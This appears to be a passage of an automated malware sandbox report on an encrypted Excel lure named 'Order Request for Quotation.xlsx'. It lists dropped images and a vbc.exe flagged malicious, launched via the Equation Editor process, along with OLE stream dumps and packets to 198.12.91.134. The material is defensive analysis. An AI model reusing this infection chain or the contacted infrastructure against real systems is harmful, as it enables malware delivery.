      SHA1:40A0EF7371524007D2AC66425DFACA355BDCA68E
      SHA-256:8538D1761B10B5C9CDFA320617718C5194E0C555B3BE4970D19AC28C337209E3
      SHA-512:7E2856F9C6F83AD535E8CA0834F9B1BE89EBAB759CEA47A1EDE99283A02EB4EBA0A527F541E8578785320E156E4298AB86FADF3881B78E9F47DB2985840DD16D
      Malicious:false
      Reputation:low
      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................%Q$...../.-z.Q.@U.%...../.../.....P./.../..N.RP./.H./......./.4./..N.RP./.H./. ....y.QH./.P./. ............z.Q............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...H./.|./...........ovdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DA42481.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41CBDB37.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75377FBA.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89DF9873.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\977CE15D.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBDC1680.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.079884407069233
      Encrypted:false
      SSDEEP:96:+SNL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:53jU+H3tWa6WdTfOYLpR8d
      MD5:184C7C6B8F6DA439988B8A3FD16AA03F
      SHA1:3D4DD38C5454DB5C75754A9985F5EFCC28221EEC
      SHA-256:EFF196C9D34ED5A4E7B26E567AB8B1F080C67404FFD6CC7377D5B772AF0D4831
      SHA-512:00A5E6682DF2661863256053586A47F29CB0399A241DBD7365FB214BC64679FD73AF6637EA4947B1920D984B2104896B34722B20B97DEE23012255794785A3E2
      Malicious:false
      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................@.6.).X.......d...................d... ......q....\...d.......d.........q....d....6.u...q....`..q`m@.$y.w..J...8............w..J.$.......d............^ q.....^ q..I...J...?...8.-........<.w................<..v.Znv....X.np....`m@.......................ovdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9110BCC.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA538FD8.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
      C:\Users\user\Desktop\~$Order Request for Quotation.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:false
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):118784
      Entropy (8bit):6.4666127843418355
      Encrypted:false
      SSDEEP:1536:/bjX1R6rHR+Gz6YsFdVfKcLe0NMDfuoFVHYGokXYtvcOOfgrJZ+R6rHJXdb:jjX1yH1HErzwmoFtoZtkJgrCyHJXd
      MD5:C8FEB9D53B567CD1BFB0E59CF7D26BC2
      SHA1:82A22CB59D46BAE21FA4877015E163EACC04A022
      SHA-256:642A0DF15A9B8E3124D638E755F0BDBACD0D1C3FF01B59B36213A190A5E5645A
      SHA-512:DA707134A7BFDCB66389F111BB363D1E7B7260BB718D6AE999A23FC538E2065D8BE766A713D8D20860E835EB21609BBBCB0D0B6C237124FA38BD2ADA04ACF157
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....!.Q.................@..........(........P....@.................................8.......................................DK..(....p..jm..................................................................(... .......t............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc...jm...p...p...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.994022984212773
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:Order Request for Quotation.xlsx
      File size:1174528
      MD5:180907e797d9f4abe57d016b3a4a0da4
      SHA1:516bd547d90c8f4ae96c1d828908f3264012937b
      SHA256:be589141d3e75f2d8b269dcca0afac7d30d6e2d10d376bb9fdd6236d164b7594
      SHA512:e7bfe8868a9335ff725aa5bd3ce237856c6e9662fa00a714f5daec664a35071363fffcf3b8d59f13e4e3f69deda06a538ac299a24c02d13df3cf3126c708d4f7
      SSDEEP:24576:5WM/J7onhseyi6szlMiOwqIZMBXwiivDfizo3CbOKBtgninGdLwdc/14/b:5T/VshstlGBZKXxsuJbjDmV/Cj
      File Content Preview:........................>...............................................................................................z.......|.......~......................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Order Request for Quotation.xlsx"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:False

      Streams

      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
      General
      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
      File Type:data
      Stream Size:64
      Entropy:2.73637206947
      Base64 Encoded:False
      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
      General
      Stream Path:\x6DataSpaces/DataSpaceMap
      File Type:data
      Stream Size:112
      Entropy:2.7597816111
      Base64 Encoded:False
      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
      General
      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
      File Type: data
      Stream Size: 200
      Entropy: 3.13335930328
      Base64 Encoded: False
      Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
      General
      Stream Path: \x6DataSpaces/Version
      File Type: data
      Stream Size: 76
      Entropy: 2.79079600998
      Base64 Encoded: False
      Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
      Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1161656
      General
      Stream Path: EncryptedPackage
      File Type: data
      Stream Size: 1161656
      Entropy: 7.99848190617
      Base64 Encoded: True
      Data ASCII: . . . . . . . . . ] . ) " . . K S . ) 3 . . v . . . . h . E . . . n . w . . . . . . . . e ] . . . . { P y . e ) M $ . & . s . . . - P r ` . . ~ 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0 . , . . R . . { 8 . # i ; 3 . 0
      Data Raw: a5 b9 11 00 00 00 00 00 04 5d e9 29 22 90 bf 4b 53 ec 29 33 c2 8b 76 ee d6 af b1 68 8a 45 0f 85 0c 6e 88 77 cc 80 94 0b d8 06 d2 95 65 5d 89 a2 95 19 7b 50 79 cf 65 29 4d 24 a3 26 f7 73 ea 9e ab 2d 50 72 60 1e d5 7e 38 84 23 69 3b 33 1d 30 86 2c a4 ee 52 80 d2 7b 38 84 23 69 3b 33 1d 30 86 2c a4 ee 52 80 d2 7b 38 84 23 69 3b 33 1d 30 86 2c a4 ee 52 80 d2 7b 38 84 23 69 3b 33 1d 30
      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
      General
      Stream Path: EncryptionInfo
      File Type: data
      Stream Size: 224
      Entropy: 4.5241562268
      Base64 Encoded: False
      Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 3 e \\ . s h X J ' . U . . G . H . 5 . . . g . . . F . . . . . . . . . . . L y . . . . . . . . l . 1 H . . . . . = . { S . O C . . .
      Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

      Network Behavior

      Network Port Distribution

      TCP Packets

      Timestamp                             Source Port  Dest Port  Source IP      Dest IP
      Jul 20, 2021 14:02:41.170805931 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.306423903 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.306543112 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.307029009 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.445785046 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.445816040 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.445833921 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.445851088 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.446018934 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.446048975 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.582732916 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582770109 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582791090 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582817078 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582909107 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582911015 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.582931995 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582937956 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.582941055 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.582957983 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582967043 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.582981110 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.582989931 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.583060980 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721278906 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721303940 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721318960 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721333981 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721349001 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721363068 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721379042 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721393108 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721411943 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721426964 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721432924 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721441984 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721455097 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721457005 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721471071 CEST  49165        80         192.168.2.22   198.12.91.134
      Jul 20, 2021 14:02:41.721472979 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721487045 CEST  80           49165      198.12.91.134  192.168.2.22
      Jul 20, 2021 14:02:41.721487045 CEST  49165        80         192.168.2.22   198.12.91.134
